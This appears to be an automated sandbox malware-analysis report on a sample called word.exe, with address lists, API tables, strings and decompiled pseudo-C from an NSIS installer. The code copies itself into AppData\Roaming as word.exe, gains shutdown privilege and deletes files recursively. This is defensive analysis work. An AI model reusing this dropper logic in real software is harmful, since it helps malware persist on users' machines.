0x0040372c
0x0040372c
0x00403725
0x0040372e
0x00403733
0x00403734
0x00403740
0x00403744
0x0040374b
0x00403759
0x0040375e
0x00403765
0x00403769
0x0040376d
0x0040376f
0x0040376f
0x0040376d
0x00403776
0x0040377d
0x00403783
0x0040379b
0x004037ab
0x004037bd
0x004037c4
0x004037c6
0x004037c7
0x004037d8
0x004037dc
0x004037dc
0x004037ef
0x004037f1
0x004038eb
0x004038eb
0x004038ee
0x004038f1
0x00000000
0x00000000
0x004037fb
0x004037fc
0x004037ff
0x00403808
0x00403808
0x0040380b
0x0040380e
0x00403811
0x00403814
0x00403814
0x00403814
0x00403815
0x00403819
0x004038d9
0x004038e2
0x004038e4
0x004038e7
0x004038ea
0x004038ea
0x004038ea
0x00000000
0x0040381f
0x00403820
0x00403821
0x00403825
0x0040383f
0x00403846
0x00403859
0x0040385a
0x0040386f
0x00403874
0x00403876
0x00403878
0x00403894
0x0040389b
0x004038ae
0x004038af
0x004038c4
0x004038ca
0x004038cc
0x004038ce
0x004038d6
0x004038d8
0x00000000
0x004038d8
0x004038d2
0x004038d4
0x004038f9
0x004038fd
0x00403906
0x0040390b
0x00403911
0x0040391c
0x0040391e
0x00403923
0x00403925
0x0040397d
0x00403982
0x0040398b
0x00403992
0x00403995
0x00403b6c
0x00403b6c
0x00403b71
0x00403b7a
0x00403b97
0x00403c0f
0x00403c0f
0x00403c17
0x00403c19
0x00403c19
0x00403c1f
0x00403c1f
0x00403bae
0x00403bba
0x00403bcb
0x00403bd2
0x00403bd9
0x00403bd9
0x00403be1
0x00403bed
0x00403bfb
0x00403c06
0x00000000
0x00000000
0x00000000
0x00403bef
0x00403bef
0x00403bf0
0x00403bf2
0x00403bf3
0x00403bf4
0x00403bf9
0x00403c08
0x00403c0a
0x00000000
0x00403c0a
0x00000000
0x00403bf9
0x00403bed
0x00403b84
0x00403b8b
0x00403b8b
0x004039a1
0x00403a48
0x00403a48
0x00403a54
0x00000000
0x00403a54
0x004039b2
0x004039ba
0x00403a0c
0x00403a0c
0x00403a12
0x00403a19
0x00403a67
0x00403a69
0x00403a6e
0x00403a70
0x00403a78
0x00403a78
0x00403a83
0x00403a8f
0x00403a95
0x00403a97
0x00403b6a
0x00403b6a
0x00403b6a
0x00000000
0x00403a9d
0x00403a9d
0x00403a9f
0x00403aa0
0x00403aa9
0x00403aa2
0x00403aa2
0x00403aa2
0x00403aaf
0x00403ab7
0x00403abe
0x00403ac6
0x00403ac6
0x00403ad3
0x00403adf
0x00403ae9
0x00403ae9
0x00403aeb
0x00403af2
0x00403afc
0x00403b08
0x00403b0e
0x00403b14
0x00403b17
0x00403b21
0x00403b27
0x00403b29
0x00403b2d
0x00403b3e
0x00403b44
0x00403b49
0x00403b4b
0x00403b4e
0x00403b54
0x00403b54
0x00403b4b
0x00403b29
0x00403b57
0x00403b5e
0x00403b5e
0x00403b5e
0x00403b5e
0x00403b65
0x00000000
0x00403b65
0x00403a97
0x00403a1b
0x00403a1e
0x00403a22
0x00403a27
0x00403a29
0x00000000
0x00000000
0x00403a35
0x00403a40
0x00403a45
0x00000000
0x00403a45
0x004039c3
0x004039db
0x004039ec
0x004039ed
0x004039f1
0x004039f3
0x00403a01
0x00403a08
0x00000000
0x00000000
0x00000000
0x00403a08
0x00403a0a
0x00000000
0x00403a0a
0x0040392d
0x00403939
0x0040393e
0x00403943
0x00403945
0x00000000
0x00000000
0x0040394d
0x00403955
0x00403966
0x0040396e
0x00403970
0x00403975
0x00403977
0x00000000
0x00000000
0x00000000
0x00403977
0x00000000
0x004038d4
0x0040387d
0x0040387f
0x00000000
0x00000000
0x00403881
0x00403885
0x00403889
0x00403890
0x00403890
0x00403890
0x00403890
0x00000000
0x00403890
0x0040388b
0x0040388e
0x00000000
0x00000000
0x00000000
0x0040388e
0x00403827
0x0040382b
0x0040382e
0x00403835
0x00403835
0x00000000
0x00403835
0x00403830
0x00403833
0x00000000
0x00000000
0x00000000
0x00403833
0x00000000
0x00000000
0x00000000
0x00403801
0x00403801
0x00403802
0x00403803
0x00403803
0x00000000
0x00403801
0x00000000

APIs

SetErrorMode.KERNELBASE(00008001), ref: 00403663
GetVersionExW.KERNEL32(?), ref: 0040368C
GetVersionExW.KERNEL32(0000011C), ref: 004036A3
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
#17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
OleInitialize.OLE32(00000000), ref: 0040377D
SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
CharNextW.USER32(00000000), ref: 004037E9
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040391C
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040392D
lstrcatW.KERNEL32 ref: 00403939
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\), ref: 0040394D
lstrcatW.KERNEL32 ref: 00403955
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403966
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040396E
DeleteFileW.KERNELBASE(1033), ref: 00403982
lstrcatW.KERNEL32 ref: 00403A69
lstrcatW.KERNEL32 ref: 00403A78

Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C

lstrcatW.KERNEL32 ref: 00403A83
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00436800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,?), ref: 00403A8F
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AAF
DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
CopyFileW.KERNEL32 ref: 00403B21
CloseHandle.KERNEL32(00000000), ref: 00403B4E
ExitProcess.KERNELBASE(?), ref: 00403B6C
OleUninitialize.OLE32 ref: 00403B71
ExitProcess.KERNEL32 ref: 00403B8B
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
ExitWindowsEx.USER32(00000002,80040002), ref: 00403BFE
ExitProcess.KERNEL32 ref: 00403C1F

Strings

\Temp, xrefs: 00403933
~nsu, xrefs: 00403A61
TMP, xrefs: 00403969
Error launching installer, xrefs: 00403A12
C:\Users\user\AppData\Local\Temp\, xrefs: 00403911, 00403916, 0040392C, 00403938, 00403947, 00403954, 00403960, 00403968, 00403A66, 00403A77, 00403A82, 00403A8E, 00403A9F, 00403AAE, 00403B64
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403659
UXTHEME, xrefs: 0040372E, 00403733, 00403739
TEMP, xrefs: 00403961
NSIS Error, xrefs: 004037A1
C:\Users\user\AppData\Roaming\word.exe, xrefs: 00403B1C
1033, xrefs: 0040397D
.tmp, xrefs: 00403A7D
SeShutdownPrivilege, xrefs: 00403BB4
Low, xrefs: 0040394F

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\word.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 2292928366-1826018249
Opcode ID: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
Opcode Fuzzy Hash: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405D74 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00405D74(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E0040603F(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x42a2e8 =  *0x42a2e8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406668(0x425750, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405F83(_t68);
					} else {
						lstrcatW(0x425750, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x425750,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E00406668(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405D2C(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004056CA(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x42a2e8 =  *0x42a2e8 + 1;
										} else {
											E004056CA(0xfffffff1, _t68);
											E00406428(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405D74(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604); // executed
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70); // executed
						goto L26;
					}
					__eflags =  *0x425750 - 0x5c;
					if( *0x425750 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E0040699E(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405F37(_t68);
							_t38 = E00405D2C(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004056CA(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004056CA(0xfffffff1, _t68);
							return E00406428(_t67, _t68, 0);
						}
						L30:
						 *0x42a2e8 =  *0x42a2e8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}

0x00405d7e
0x00405d83
0x00405d8c
0x00405d8f
0x00405d97
0x00405d9a
0x00405d9d
0x00405da5
0x00405da7
0x00405da8
0x00000000
0x00405da8
0x00405db3
0x00405db6
0x00405db6
0x00405db6
0x00405dba
0x00405dcd
0x00405dd4
0x00405dd9
0x00405ddd
0x00405ded
0x00405ddf
0x00405de5
0x00405de5
0x00405df2
0x00405df6
0x00405e02
0x00405e08
0x00405e0d
0x00405e13
0x00405e1e
0x00405e24
0x00405e26
0x00405e29
0x00405ed3
0x00405ed3
0x00405ed7
0x00405ed9
0x00405ed9
0x00405ed9
0x00405ed9
0x00000000
0x00000000
0x00000000
0x00000000
0x00405e2f
0x00405e2f
0x00405e2f
0x00405e37
0x00405e57
0x00405e5f
0x00405e64
0x00405e6b
0x00405e86
0x00405e8b
0x00405e8d
0x00405eb1
0x00405e8f
0x00405e8f
0x00405e92
0x00405ea6
0x00405e94
0x00405e97
0x00405e9f
0x00405e9f
0x00405e92
0x00405e6d
0x00405e73
0x00405e75
0x00405e7b
0x00405e7b
0x00405e75
0x00000000
0x00405e6b
0x00405e39
0x00405e41
0x00000000
0x00000000
0x00405e43
0x00405e4b
0x00000000
0x00000000
0x00405e4d
0x00405e55
0x00000000
0x00000000
0x00000000
0x00405eb6
0x00405ebe
0x00405ec4
0x00405ec4
0x00405ecd
0x00000000
0x00405ecd
0x00405df8
0x00405e00
0x00000000
0x00000000
0x00000000
0x00405dbc
0x00405dbc
0x00405dbe
0x00405ede
0x00405ee0
0x00405ee3
0x00405f34
0x00405f34
0x00405f34
0x00405ee5
0x00405ee8
0x00405ef3
0x00405ef8
0x00405efa
0x00000000
0x00000000
0x00405efd
0x00405f09
0x00405f0e
0x00405f10
0x00000000
0x00405f2b
0x00405f12
0x00405f15
0x00000000
0x00000000
0x00405f1a
0x00000000
0x00405f21
0x00405eea
0x00405eea
0x00000000
0x00405eea
0x00405dc4
0x00405dc7
0x00000000
0x00000000
0x00000000
0x00405dc7

APIs

DeleteFileW.KERNELBASE(?,?,7556D4C4,755513E0,00000000), ref: 00405D9D
lstrcatW.KERNEL32 ref: 00405DE5
lstrcatW.KERNEL32 ref: 00405E08
lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsmF994.tmp\*.*,?,?,7556D4C4,755513E0,00000000), ref: 00405E0E
FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsmF994.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsmF994.tmp\*.*,?,?,7556D4C4,755513E0,00000000), ref: 00405E1E
FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
FindClose.KERNELBASE(00000000), ref: 00405ECD

Strings

\*.*, xrefs: 00405DDF
., xrefs: 00405E2F
C:\Users\user\AppData\Local\Temp\nsmF994.tmp\*.*, xrefs: 00405DCD, 00405DD3, 00405DE4, 00405E1D
., xrefs: 00405E43

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: .$.$C:\Users\user\AppData\Local\Temp\nsmF994.tmp\*.*$\*.*
API String ID: 2035342205-1730890
Opcode ID: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
Opcode Fuzzy Hash: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE

Uniqueness

Uniqueness Score: -1.00%

Function 00406D5F Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00406D5F() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
